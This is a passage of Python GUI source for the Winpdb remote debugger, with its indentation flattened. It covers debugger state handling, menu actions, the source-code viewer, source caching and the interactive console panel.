fsynchronicity = self.m_session_manager.get_synchronicity()
self.set_toolbar_item_text(TB_SYNCHRONICITY, TB_SYNCHRONICITY_TEXT % str(fsynchronicity))
def update_state(self, event):
wx.CallAfter(self.callback_state, event)
def callback_state(self, event):
old_state = self.m_state
self.m_state = event.m_state
(menu_update_dict, toolbar_update_dict) = STATE_MAP[self.m_state]
self.set_menu_items_state(menu_update_dict)
self.set_toolbar_items_state(toolbar_update_dict)
try:
index = STATE_DETACHED_MENU[DISABLED].index(ML_RESTART)
del STATE_DETACHED_MENU[DISABLED][index]
STATE_DETACHED_MENU[ENABLED].append(ML_RESTART)
except ValueError:
pass
state_text = self.m_state
if state_text == rpdb2.STATE_BROKEN:
state_text = rpdb2.STR_STATE_BROKEN
self.set_statusbar_data({SB_STATE: state_text.upper()})
if self.m_state == rpdb2.STATE_DETACHED:
self.m_fembedded_warning = True
self.set_statusbar_data({SB_ENCRYPTION: (None, None)})
self.clear_menu_items(ML_WINDOW)
self.m_source_manager._clear()
self.m_code_viewer._clear()
self.m_namespace_viewer._clear()
self.m_stack_viewer._clear()
self.m_threads_viewer._clear()
self.m_console.set_focus()
self.SetTitle(WINPDB_TITLE)
elif (old_state in [rpdb2.STATE_DETACHED, rpdb2.STATE_DETACHING, rpdb2.STATE_SPAWNING, rpdb2.STATE_ATTACHING]) and (self.m_state not in [rpdb2.STATE_DETACHED, rpdb2.STATE_DETACHING, rpdb2.STATE_SPAWNING, rpdb2.STATE_ATTACHING]):
try:
serverinfo = self.m_session_manager.get_server_info()
title = calc_title(serverinfo.m_filename)
self.SetTitle(title)
f = self.m_session_manager.get_encryption()
except rpdb2.NotAttached:
f = False
data = [BASE64_UNLOCKED, BASE64_LOCKED][f]
tooltip = [TOOLTIP_UNLOCKED, TOOLTIP_LOCKED][f]
self.set_statusbar_data({SB_ENCRYPTION: (data, tooltip)})
if self.m_state == rpdb2.STATE_BROKEN:
self.set_toggle(TB_EXCEPTION, False)
#self.m_code_viewer._enable()
self.m_namespace_viewer._enable()
self.m_stack_viewer._enable()
self.m_threads_viewer._enable()
self.Raise()
if self.m_fembedded_warning and self.m_session_manager.get_server_info().m_fembedded:
self.m_fembedded_warning = False
warning = STR_EMBEDDED_WARNING
if not warning in g_ignored_warnings:
dlg = wx.MessageDialog(self, MSG_WARNING_TEMPLATE % (warning, ), MSG_WARNING_TITLE, wx.OK | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
g_ignored_warnings[warning] = True
elif self.m_state == rpdb2.STATE_ANALYZE:
self.set_toggle(TB_EXCEPTION, True)
#self.m_code_viewer._enable()
self.m_namespace_viewer._enable()
self.m_stack_viewer._enable()
self.m_threads_viewer._disable()
self.m_console.set_focus()
else:
#self.m_code_viewer._disable()
self.m_namespace_viewer._disable()
self.m_stack_viewer._disable()
self.m_threads_viewer._disable()
self.m_console.set_focus()
def do_website(self, event):
self.job_post(open_new, (WEBSITE_URL, ))
def do_support(self, event):
self.job_post(open_new, (SUPPORT_URL, ))
def do_docs(self, event):
self.job_post(open_new, (DOCS_URL, ))
def do_ext_docs(self, event):
self.job_post(open_new, (EXT_DOCS_URL, ))
def do_updates(self, event):
self.job_post(open_new, (UPDATES_URL, ))
def do_license(self, event):
about = CHTMLDialog(self, LICENSE_TITLE, LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
about.ShowModal()
about.Destroy()
def do_about(self, event):
about = CHTMLDialog(self, ABOUT_TITLE, ABOUT_NOTICE)
about.ShowModal()
about.Destroy()
def do_password(self, event):
pwd = self.m_session_manager.get_password()
pwd_dialog = CPwdDialog(self, pwd)
r = pwd_dialog.ShowModal()
if r == wx.ID_OK:
pwd = pwd_dialog.get_password()
try:
self.m_session_manager.set_password(pwd)
except rpdb2.AlreadyAttached:
assert(0)
pwd_dialog.Destroy()
def do_launch(self, event):
(fchdir, command_line) = self.m_session_manager.get_launch_args()
if None in (fchdir, command_line):
(fchdir, command_line) = (True, '')
launch_dialog = CLaunchDialog(self, fchdir, command_line)
r = launch_dialog.ShowModal()
if r == wx.ID_OK:
(command_line, fchdir) = launch_dialog.get_command_line()
self.m_async_sm.launch(fchdir, command_line)
launch_dialog.Destroy()
def do_open(self, event):
host = self.m_session_manager.get_host().lower()
flocal = (host in [rpdb2.LOCALHOST, rpdb2.LOOPBACK])
open_dialog = COpenDialog(self, flocal)
r = open_dialog.ShowModal()
if r == wx.ID_OK:
file_name = open_dialog.get_file_name()
self.m_code_viewer.set_file(file_name, fComplain = True)
open_dialog.Destroy()
def do_attach(self, event):
attach_dialog = CAttachDialog(self, self.m_session_manager)
r = attach_dialog.ShowModal()
if r == wx.ID_OK:
server = attach_dialog.get_server()
self.m_async_sm.attach(server.m_rid, server.m_filename)
attach_dialog.Destroy()
def do_detach(self, event):
self.m_async_sm.detach()
def do_stop(self, event):
self.m_async_sm.stop_debuggee()
def do_restart(self, event):
self.m_async_sm.restart()
def do_disable(self, event):
self.m_async_sm.disable_breakpoint([], True)
def do_enable(self, event):
self.m_async_sm.enable_breakpoint([], True)
def do_clear(self, event):
self.m_async_sm.delete_breakpoint([], True)
def do_load(self, event):
self.m_async_sm.with_callback(self.callback_load).load_breakpoints()
def callback_load(self, r, exc_info):
(t, v, tb) = exc_info
if t == socket.error or isinstance(v, rpdb2.CException):
error = rpdb2.STR_BREAKPOINTS_LOAD_PROBLEM
elif t == IOError:
error = rpdb2.STR_BREAKPOINTS_NOT_FOUND
else:
return
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def do_save(self, event):
self.m_async_sm.with_callback(self.callback_save).save_breakpoints()
def do_more_bp(self, event):
dlg = wx.MessageDialog(self, STR_MORE_ABOUT_BREAKPOINTS, MORE_TIP, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
def do_jump(self, event):
dlg = wx.MessageDialog(self, STR_HOW_TO_JUMP, MORE_TIP, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
def callback_save(self, r, exc_info):
(t, v, tb) = exc_info
if t in (socket.error, IOError) or isinstance(v, rpdb2.CException):
error = rpdb2.STR_BREAKPOINTS_SAVE_PROBLEM
else:
return
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def do_go(self, event):
self.m_async_sm.request_go()
def do_break(self, event):
self.m_async_sm.request_break()
def do_step(self, event):
self.m_async_sm.request_step()
def do_next(self, event):
self.m_async_sm.request_next()
def do_return(self, event):
self.m_async_sm.request_return()
def do_goto(self, event):
(filename, lineno) = self.m_code_viewer.get_file_lineno()
self.m_async_sm.request_go_breakpoint(filename, '', lineno)
def do_exit(self, event = None):
self.Close()
class CWinpdbApp(wx.App):
def __init__(self, session_manager, fchdir, command_line, fAttach, fAllowUnencrypted):
self.m_frame = None
self.m_session_manager = session_manager
self.m_fchdir = fchdir
self.m_command_line = command_line
self.m_fAttach = fAttach
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_settings = CSettings(WINPDB_SETTINGS_DEFAULT)
wx.App.__init__(self, redirect = False)
def OnInit(self):
wx.SystemOptions.SetOptionInt("mac.window-plain-transition", 1)
self.m_settings.load_settings()
if (not self.m_fAllowUnencrypted) and not rpdb2.is_encryption_supported():
dlg = wx.MessageDialog(None, rpdb2.STR_ENCRYPTION_SUPPORT_ERROR, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return True
self.m_frame = CWinpdbWindow(self.m_session_manager, self.m_settings)
self.m_frame.Show()
self.m_frame.start(self.m_fchdir, self.m_command_line, self.m_fAttach)
self.SetTopWindow(self.m_frame)
return True
def OnExit(self):
self.m_settings.save_settings()
class CCaption(wx.Panel):
def __init__(self, *args, **kwargs):
label = kwargs.pop("label", "")
wx.Panel.__init__(self, *args, **kwargs)
self.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_INACTIVECAPTION))
self.SetForegroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_static_text = wx.StaticText(self, -1, label)
sizerv.Add(self.m_static_text, 0, wx.EXPAND | wx.ALL, 2)
font = self.m_static_text.GetFont()
new_font = wx.Font(pointSize = font.GetPointSize(), family = font.GetFamily(), style = font.GetStyle(), weight = wx.BOLD, face = font.GetFaceName())
self.m_static_text.SetFont(new_font)
self.SetSizer(sizerv)
sizerv.Fit(self)
class CCaptionManager:
def bind_caption(self, widget):
widget.Bind(wx.EVT_SET_FOCUS, self.OnGainFocus)
widget.Bind(wx.EVT_KILL_FOCUS, self.OnLoseFocus)
self.m_n_focus = 0
def OnGainFocus(self, event):
self.m_n_focus += 1
self.m_caption.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION))
self.m_caption.Refresh()
event.Skip()
def OnLoseFocus(self, event):
self.m_n_focus -= 1
if self.m_n_focus > 0:
return
#
# Event may get sent after the object has been deleted.
#
try:
self.m_caption.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_INACTIVECAPTION))
self.m_caption.Refresh()
except wx.PyDeadObjectError:
pass
event.Skip()
class CStyledViewer(stc.StyledTextCtrl):
def __init__(self, *args, **kwargs):
self.m_margin_command = kwargs.pop('margin_command', None)
stc.StyledTextCtrl.__init__(self, *args, **kwargs)
#
# Force Left to Right since CStyledViewer is broken for Right to Left.
# Not available on wxPython 2.6
#
if hasattr(self, 'SetLayoutDirection'):
self.SetLayoutDirection(1)
self.SetLexer(stc.STC_LEX_PYTHON)
self.SetKeyWords(0, " ".join(keyword.kwlist))
self.SetReadOnly(True)
self.SetVisiblePolicy(wx.stc.STC_VISIBLE_SLOP, 7)
self.SetViewWhiteSpace(False)
self.SetIndentationGuides(True)
self.SetEOLMode(stc.STC_EOL_LF)
self.SetViewEOL(False)
self.SetProperty("fold", "0")
self.SetMarginType(0, stc.STC_MARGIN_NUMBER)
self.SetMarginMask(0, 0x0)
self.SetMarginWidth(0, 40)
self.SetMarginType(1, stc.STC_MARGIN_SYMBOL)
self.SetMarginMask(1, 0x1F)
self.SetMarginWidth(1, 16)
self.SetMarginSensitive(1, True)
if self.m_margin_command is not None:
self.Bind(stc.EVT_STC_MARGINCLICK, self.m_margin_command)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyPressed)
self.Bind(wx.EVT_KEY_UP, self.OnKeyReleased)
if wx.Platform == '__WXMSW__':
self.StyleSetSpec(stc.STC_STYLE_DEFAULT, 'fore:#000000,back:#FFFFFF,face:Courier New,size:9')
else:
self.StyleSetSpec(stc.STC_STYLE_DEFAULT, 'fore:#000000,back:#FFFFFF,face:Courier')
self.StyleClearAll()
self.SetTabWidth(rpdb2.PYTHON_TAB_WIDTH)
self.StyleSetSpec(stc.STC_STYLE_LINENUMBER, 'fore:#000000,back:#99A9C2')
self.StyleSetSpec(stc.STC_STYLE_BRACELIGHT, 'fore:#00009D,back:#FFFF00')
self.StyleSetSpec(stc.STC_STYLE_BRACEBAD, 'fore:#00009D,back:#FF0000')
self.StyleSetSpec(stc.STC_STYLE_INDENTGUIDE, "fore:#CDCDCD")
self.StyleSetSpec(stc.STC_P_DEFAULT, 'fore:#000000')
self.StyleSetSpec(stc.STC_P_COMMENTLINE, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(stc.STC_P_COMMENTBLOCK, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(stc.STC_P_NUMBER, 'fore:#008050')
self.StyleSetSpec(stc.STC_P_STRING, 'fore:#800080')
self.StyleSetSpec(stc.STC_P_CHARACTER, 'fore:#800080')
self.StyleSetSpec(stc.STC_P_WORD, 'fore:#000080,bold')
self.StyleSetSpec(stc.STC_P_TRIPLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(stc.STC_P_TRIPLEDOUBLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(stc.STC_P_CLASSNAME, 'fore:#0000FF,bold')
self.StyleSetSpec(stc.STC_P_DEFNAME, 'fore:#008050,bold')
self.StyleSetSpec(stc.STC_P_OPERATOR, 'fore:#800000,bold')
self.StyleSetSpec(stc.STC_P_IDENTIFIER, 'fore:#000000')
self.SetSelBackground(True, '#316ac5')
self.SetSelForeground(True, wx.WHITE)
self.MarkerDefine(MARKER_BREAKPOINT_ENABLED, stc.STC_MARKER_MAX, wx.BLACK, (255, 0, 0))
self.MarkerDefine(MARKER_BREAKPOINT_DISABLED, stc.STC_MARKER_MAX, wx.BLACK, (255, 255, 128))
self.MarkerDefine(MARKER_CURRENT_LINE, stc.STC_MARKER_MAX, wx.WHITE, (150, 150, 255))
self.MarkerDefine(MARKER_CURRENT_LINE_HIT, stc.STC_MARKER_MAX, wx.BLACK, (215, 215, 255))
self.MarkerDefine(MARKER_CALL, stc.STC_MARK_CHARACTER + ord('C'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_LINE, stc.STC_MARK_CHARACTER + ord('L'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_RETURN, stc.STC_MARK_CHARACTER + ord('R'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_EXCEPTION, stc.STC_MARK_CHARACTER + ord('E'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_RUNNING, stc.STC_MARK_CHARACTER + ord('*'), wx.WHITE, "#99A9C2")
def _clear(self):
self.SetReadOnly(False)
self.ClearAll()
self.SetReadOnly(True)
def load_source(self, value):
self.SetReadOnly(False)
self.ClearAll()
self.SetText(value)
self.SetReadOnly(True)
self.GotoLine(0)
self.EmptyUndoBuffer()
self.SetSavePoint()
def OnKeyReleased(self, event):
key_code = event.GetKeyCode()
if key_code == wx.WXK_CONTROL:
self.GetParent().GetEventHandler().ProcessEvent(event)
event.Skip()
def OnKeyPressed(self, event):
key_code = event.GetKeyCode()
if key_code == wx.WXK_TAB:
forward = not event.ShiftDown()
switch = event.ControlDown()
if switch:
self.GetParent().GetEventHandler().ProcessEvent(event)
return
ne = wx.NavigationKeyEvent()
ne.SetDirection(forward)
ne.SetCurrentFocus(self)
ne.SetEventObject(self)
self.GetParent().GetEventHandler().ProcessEvent(ne)
event.Skip()
return
event.Skip()
class CSourceManager:
def __init__(self, job_manager, session_manager):
self.m_job_manager = job_manager
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(session_manager, self.m_job_manager)
self.m_files = {}
self.m_lock = threading.RLock()
def _clear(self):
self.m_files = {}
def mark_files_dirty(self):
for k, v in list(self.m_files.items()):
self.m_files[k] = (DIRTY_CACHE, rpdb2.as_string(''))
def is_in_files(self, filename):
for k in list(self.m_files.keys()):
if filename in k:
return True
return False
def get_source(self, filename):
for k, v in list(self.m_files.items()):
if not filename in k:
continue
(_time, source) = v
if _time == 0:
return (k, source)
t = time.time()
if t - _time < BAD_FILE_WARNING_TIMEOUT_SEC:
return (k, source)
#del self.m_files[k]
raise KeyError
raise KeyError
def load_source(self, filename, callback, args, fComplain):
f = lambda r, exc_info: self.callback_load_source(r, exc_info, filename, callback, args, fComplain)
self.m_async_sm.with_callback(f, ftrace = True).get_source_file(filename, -1, -1)
def callback_load_source(self, r, exc_info, filename, callback, args, fComplain):
(t, v, tb) = exc_info
if self.m_session_manager.get_state() == rpdb2.STATE_DETACHED:
return
if t == None:
_time = 0
_filename = r[rpdb2.DICT_KEY_FILENAME]
source_lines = r[rpdb2.DICT_KEY_LINES]
source = string.join(source_lines, '')
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
elif t == rpdb2.NotPythonSource and fComplain:
dlg = wx.MessageDialog(None, MSG_ERROR_FILE_NOT_PYTHON % (filename, ), MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return
elif t in (IOError, socket.error, rpdb2.NotPythonSource) or isinstance(v, rpdb2.CConnectionException):
if fComplain:
dlg = wx.MessageDialog(None, STR_FILE_LOAD_ERROR % (filename, ), MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return
if t == IOError and rpdb2.BLENDER_SOURCE_NOT_AVAILABLE in v.args and not self.is_in_files(filename):
dlg = wx.MessageDialog(None, STR_BLENDER_SOURCE_WARNING, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
_time = time.time()
_filename = filename
source = STR_FILE_LOAD_ERROR2 % (filename, )
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
else:
rpdb2.print_debug('get_source_file() returned the following error: %s' % repr(t))
_time = time.time()
_filename = filename
source = STR_FILE_LOAD_ERROR2 % (filename, )
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
try:
self.m_lock.acquire()
fNotify = not self.is_in_files(_filename)
self.m_files[_filename] = (_time, source)
finally:
self.m_lock.release()
_args = (_filename, ) + args + (fNotify, )
callback(*_args)
class CCodeViewer(wx.Panel, CJobs, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_notify_filename = kwargs.pop('notify_filename', None)
self.m_source_manager = kwargs.pop('source_manager')
wx.Panel.__init__(self, *args, **kwargs)
CJobs.__init__(self)
self.init_jobs()
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_history = []
self.m_history_index = 0
self.m_fSwitch = False
self.m_swiched_original = None
self.m_files = {}
self.m_cur_filename = None
self.m_pos_filename = None
self.m_pos_lineno = None
self.m_pos_event = None
self.m_breakpoint_lines = {}
self.m_request_number = 0
self.m_last_position_time = 0
self.m_event2Marker = {'running': MARKER_RUNNING, 'call': MARKER_CALL, 'line': MARKER_LINE, 'return': MARKER_RETURN, 'exception': MARKER_EXCEPTION}
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_SOURCE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_viewer = CStyledViewer(self, style = wx.TAB_TRAVERSAL, margin_command = self.on_margin_clicked)
self.bind_caption(self.m_viewer)
sizerv.Add(self.m_viewer, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
self.m_sizerv = sizerv
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyPressed)
self.Bind(wx.EVT_KEY_UP, self.OnKeyReleased)
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
def OnDestroyWindow(self, event):
self.shutdown_jobs()
def set_cursor(self, id):
self.m_viewer.SetSTCCursor([stc.STC_CURSORNORMAL, stc.STC_CURSORWAIT][id == wx.CURSOR_WAIT])
def on_margin_clicked(self, event):
lineno = self.m_viewer.LineFromPosition(event.GetPosition()) + 1
self.__toggle_breakpoint(lineno)
event.Skip()
def get_file_lineno(self):
lineno = self.m_viewer.GetCurrentLine() + 1
return (self.m_cur_filename, lineno)
def toggle_breakpoint(self):
lineno = self.m_viewer.GetCurrentLine() + 1
self.__toggle_breakpoint(lineno)
def __toggle_breakpoint(self, lineno):
try:
bpl = self.m_session_manager.get_breakpoints()
except rpdb2.NotAttached:
return
id = self.m_breakpoint_lines.get(lineno, None)
if id is not None:
bp = bpl.get(id, None)
if (id is None) or (bp is None):
self.m_async_sm.set_breakpoint(self.m_cur_filename, '', lineno, True, '')
return
self.m_async_sm.delete_breakpoint([id], False)
def _disable(self):
self.m_viewer.Disable()
def _enable(self):
self.m_viewer.Enable()
def get_history(self, fBack):
self.m_history_index = (self.m_history_index + [-1, 1][fBack]) % len(self.m_history)
return self.m_history[self.m_history_index]
def set_history(self, value):
if value in self.m_history:
self.m_history.remove(value)
self.m_history.insert(0, value)
self.m_history = self.m_history[:50]
self.m_history_index = 0
def OnKeyPressed(self, event):
if len(self.m_history) < 2:
return
if self.m_fSwitch == False:
self.m_fSwitch = True
self.m_swiched_original = self.m_cur_filename
value = self.get_history(event.ShiftDown())
self.set_file(value, fNoHistory = True)
def OnKeyReleased(self, event):
if self.m_fSwitch == False:
return
if self.m_swiched_original == self.m_cur_filename:
return
self.set_history(self.m_cur_filename)
def _clear(self):
self.m_history = []
self.m_history_index = 0
self.m_fSwitch = False
self.m_swiched_original = None
self.m_files = {}
self.m_cur_filename = None
self.m_pos_filename = None
self.m_pos_lineno = None
self.m_pos_event = None
self.m_viewer._clear()
def __notify_filename(self, filename, fNew):
if self.m_notify_filename is None:
return
if fNew:
def command(event, filename = filename):
self.set_file(filename)
else:
command = None
self.m_notify_filename(filename, command)
def refresh(self):
if self.m_cur_filename == None:
return
filename = self.m_cur_filename
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
self.m_cur_filename = None
self.set_file(filename)
def set_file(self, filename, fNoHistory = False, request_number = 0, fNotify = False, fComplain = False):
if fNotify:
self.__notify_filename(filename, fNew = True)
if request_number == 0:
self.m_request_number += 1
request_number = self.m_request_number
elif request_number < self.m_request_number:
return
if self.m_cur_filename == filename:
return
try:
(_filename, source) = self.m_source_manager.get_source(filename)
except KeyError:
self.m_source_manager.load_source(filename, self.set_file, (fNoHistory, request_number,), fComplain)
return
if self.m_cur_filename == _filename:
return
self.__notify_filename(filename, fNew = False)
if self.m_cur_filename is not None:
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
lineno = self.m_files.get(_filename, 1)
self.m_viewer.load_source(source)
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
displayed_filename = _filename
if not g_fUnicode:
displayed_filename = rpdb2.as_string(displayed_filename, wx.GetDefaultPyEncoding())
label = CAPTION_SOURCE + ' ' + rpdb2.clip_filename(displayed_filename)
self.m_caption.m_static_text.SetLabel(label)
self.m_sizerv.Layout()
self.m_cur_filename = _filename
self.set_markers()
if fNoHistory == False:
self.set_history(self.m_cur_filename)
def set_position(self, filename, lineno, event, request_number = 0, fNotify = False):
if fNotify:
self.__notify_filename(filename, fNew = True)
if request_number == 0:
self.m_request_number += 1
request_number = self.m_request_number
elif request_number < self.m_request_number:
return
if self.m_cur_filename != filename:
try:
(_filename, source) = self.m_source_manager.get_source(filename)
except KeyError:
self.m_source_manager.load_source(filename, self.set_position, (lineno, event, request_number), fComplain = False)
return
self.__notify_filename(filename, fNew = False)
if self.m_cur_filename is not None:
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
self.m_viewer.load_source(source)
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
displayed_filename = filename
if not g_fUnicode:
displayed_filename = rpdb2.as_string(displayed_filename, wx.GetDefaultPyEncoding())
label = CAPTION_SOURCE + ' ' + rpdb2.clip_filename(displayed_filename)
self.m_caption.m_static_text.SetLabel(label)
self.m_sizerv.Layout()
self.m_cur_filename = filename
self.m_pos_filename = filename
self.m_pos_lineno = lineno
self.m_pos_event = event
self.set_markers()
self.set_history(self.m_cur_filename)
self.m_last_position_time = time.time()
def update_bp(self, event):
if self.m_pos_filename is None:
return
fposition_timeout = time.time() - self.m_last_position_time > POSITION_TIMEOUT
if event.m_action == rpdb2.CEventBreakpoint.SET and fposition_timeout:
if self.m_cur_filename == event.m_bp.m_filename:
lineno = event.m_bp.m_lineno
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
self.set_markers()
def set_markers(self):
for marker in MARKER_LIST:
self.m_viewer.MarkerDeleteAll(marker)
if self.m_pos_filename == self.m_cur_filename:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, self.m_event2Marker[self.m_pos_event])
f_current_line = False
try:
bpl = self.m_session_manager.get_breakpoints()
except rpdb2.NotAttached:
return
self.m_breakpoint_lines = {}
for bp in bpl.values():
if bp.m_filename != self.m_cur_filename:
continue
self.m_breakpoint_lines[bp.m_lineno] = bp.m_id
if (self.m_pos_filename == self.m_cur_filename) and (bp.m_lineno == self.m_pos_lineno) and bp.m_fEnabled:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, MARKER_CURRENT_LINE_HIT)
f_current_line = True
else:
marker = [MARKER_BREAKPOINT_DISABLED, MARKER_BREAKPOINT_ENABLED][bp.m_fEnabled]
self.m_viewer.MarkerAdd(bp.m_lineno - 1, marker)
if (self.m_pos_filename == self.m_cur_filename) and not f_current_line:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, MARKER_CURRENT_LINE)
class CConsole(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_exit_command = kwargs.pop('exit_command')
wx.Panel.__init__(self, *args, **kwargs)
#
# CConsole acts as stdin and stdout so it exposes the encoding property.
#
if not g_fUnicode:
self.encoding = wx.GetDefaultPyEncoding()
else:
self.encoding = 'utf-8'
self.m_fcompletions_warning = False
self.m_completions = None
self.m_history = ['']
self.m_history_index_up = 0
self.m_history_index_down = 0
self.m_history_index_errors = 0
self.m_console = rpdb2.CConsole(self.m_session_manager, stdin = self, stdout = self, fSplit = True)
self.m_queue = Queue.Queue()
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_CONSOLE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_console_out = wx.TextCtrl(self, style = wx.TAB_TRAVERSAL | wx.TE_MULTILINE | wx.HSCROLL | wx.VSCROLL)
self.m_console_out.Bind(wx.EVT_KEY_DOWN, self.OnConsoleOutKeyPressed)
self.bind_caption(self.m_console_out)
self.set_font(self.m_console_out)
sizerv.Add(self.m_console_out, 1, wx.EXPAND | wx.ALL, 0)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.EXPAND | wx.ALL, 0)
label = wx.StaticText(self, -1, LABEL_CONSOLE, style = wx.TAB_TRAVERSAL)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 0)
self.m_console_in = wx.TextCtrl(self, style = wx.TE_PROCESS_ENTER)
self.bind_caption(self.m_console_in)
self.set_font(self.m_console_in)
self.m_console_in.SetFocus()
self.m_console_in.Bind(wx.EVT_CHAR, self.OnChar)
self.m_console_in.Bind(wx.EVT_TEXT_ENTER, self.OnSendText)
sizerh.Add(self.m_console_in, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def OnConsoleOutKeyPressed(self, event):
key_code = event.GetKeyCode()
if key_code != wx.WXK_TAB:
return
forward = not event.ShiftDown()
ne = wx.NavigationKeyEvent()
ne.SetDirection(forward)
ne.SetCurrentFocus(self.m_console_out)
ne.SetEventObject(self.m_console_out)
self.GetEventHandler().ProcessEvent(ne)
event.Skip()
def set_focus(self):
self.m_console_in.SetFocus()
def set_filename(self, filename):
self.m_console.set_filename(filename)
def set_font(self, ctrl):
font = ctrl.GetFont()
if wx.Platform == '__WXMSW__':
face = "Courier New"
point_size = 9
else:
face = "Courier"
point_size = font.GetPointSize()
new_font = wx.Font(pointSize = point_size, family = font.GetFamily(), style = font.GetStyle(), weight = font.GetWeight(), face = face)
ctrl.SetFont(new_font)
def start(self):
self.m_console.start()
self.m_console.printer(COMPLETIONS_NOTICE)
def stop(self):
self.m_queue.put('exit\n')
self.m_queue.put('exit\n')
self.m_console.join()
def write(self, _str):
if not g_fUnicode:
_str = rpdb2.as_string(_str, wx.GetDefaultPyEncoding())
else:
_str = rpdb2.as_unicode(_str, self.encoding)
sl = _str.split('\n')
_str = ''
for s in sl:
while True:
_str += '\n' + s[:81]
s = s[81:]
if len(s) == 0:
break
wx.CallAfter(self.m_console_out.write, _str[1:])
def flush(self):
pass
def readline(self):
_str = self.m_queue.get()
return _str
def OnChar(self, event):
key = event.GetKeyCode()
if self.m_fcompletions_warning:
self.m_fcompletions_warning = False
if key in [ord(c) for c in COMPLETIONS_WARNING_CONFIRM_CHARS]:
self.CompleteExpression(fForce = True)
return
if (key + ord('a') - 1) in [ord('n'), ord('N')] and event.ControlDown():
self.CompleteExpression()
event.Skip()
return
if key in [wx.WXK_UP, wx.WXK_DOWN]:
value = self.m_console_in.GetValue()
_value = self.get_history(key == wx.WXK_UP, value)
self.m_console_in.SetValue(_value)
self.m_console_in.SetInsertionPointEnd()
return
event.Skip()
def CompleteExpression(self, fForce = False):
v = self.m_console_in.GetValue()
ip = self.m_console_in.GetInsertionPoint()
ce = v[:ip]
completions = []
while True:
c = self.m_console.complete(ce, len(completions))
if c == None:
break
completions.append(c)
if completions == []:
return
d = calc_denominator(completions)
nv = d + v[ip:]
self.m_console_in.SetValue(nv)
self.m_console_in.SetInsertionPoint(len(d))
if len(completions) == 1:
return
if len(completions) > COMPLETIONS_WARNING_THRESHOLD and not fForce:
self.m_console_out.write(COMPLETIONS_WARNING % len(completions))
self.m_fcompletions_warning = True
return
if ce != '' and ce.split()[0] == 'launch':
#
# Go over launch completions and extract the basenames.
# Add a trailing path seperator '/' to dir names completions.
#
_completions = []
for c in completions:
p = c.split()[-1]
dn, bn = os.path.split(p)
if bn == '':
bn = os.path.join(os.path.split(dn)[1], '')
_completions.append(bn)
completions = _completions
